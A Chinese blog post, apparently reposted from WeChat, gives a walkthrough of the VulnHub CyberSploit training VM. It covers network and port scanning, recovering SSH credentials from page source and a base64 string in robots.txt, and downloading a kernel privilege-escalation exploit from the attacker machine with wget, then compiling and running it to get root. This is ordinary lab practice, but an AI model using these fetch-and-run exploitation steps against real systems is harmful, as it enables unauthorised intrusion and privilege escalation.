vulnhub之cybersploit的实践

admin

102755
文章

87
评论

2023年4月10日10:00:04评论21 views字数 823阅读2分44秒阅读模式

今天实践的是vulnhub的cybersploit镜像，

下载地址，https://download.vulnhub.com/cybersploit/cybersploit.ova，

还是只能用virtualbox导入，做地址扫描，

sudo netdiscover -r 192.168.0.0/24，有地址了，186就是，

vulnhub之cybersploit的实践

再继续做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.0.186，

vulnhub之cybersploit的实践

有web服务，浏览器访问http://192.168.0.186，

查看页面源码，获取到用户名itsskv，

vulnhub之cybersploit的实践

做一下目录暴破，dirb http://192.168.0.186，

vulnhub之cybersploit的实践

浏览器访问http://192.168.0.186/robots.txt，

vulnhub之cybersploit的实践

在线对R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9做base64解码，

获取到密码cybersploit{youtube.com/c/cybersploit}，

vulnhub之cybersploit的实践

ssh登录靶机，ssh [email protected]，id确认不是root，需要提权，

vulnhub之cybersploit的实践

uname -a查看内核版本是3.13.0-32-generic，

从网上搜到本地提权的poc代码，

vulnhub之cybersploit的实践

下载到kali攻击机，改名成37292.c，kali攻击机上开启http下载服务，

python2 -m SimpHTTPServer，

在靶机上进入tmp目录，cd /tmp，

下载代码文件，wget http://192.168.0.190:8000/37292.c，

编译可执行文件，gcc 37292.c -o poc，

执行，./poc，id确认是root，

vulnhub之cybersploit的实践

本周的实践到此结束，本周的实践到此结束，本周的实践到此结束，本周的实践到此结束，本周的实践到此结束。

原文始发于微信公众号（云计算和网络安全技术实践）：vulnhub之cybersploit的实践

左青龙
微信扫一扫

右白虎
微信扫一扫

vulnhub之cybersploit的实践

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

任意用户登录漏洞挖掘思路

AI安全白皮书 - 华为

人工智能硬件安全白皮书 - DUEROS百度安全

漏洞挖掘 | 某学工平台越权

PostExpKit - 20240423更新

yzmcms-pay_callback-rce漏洞复现

owasp大模型应用威胁视图理解大模型应用目前所面临的主要安全威胁

新一代供应链安全攻击面

《生成式人工智能数据应用合规指南》正式发布，5月1日实施

发表评论

在线咨询

微信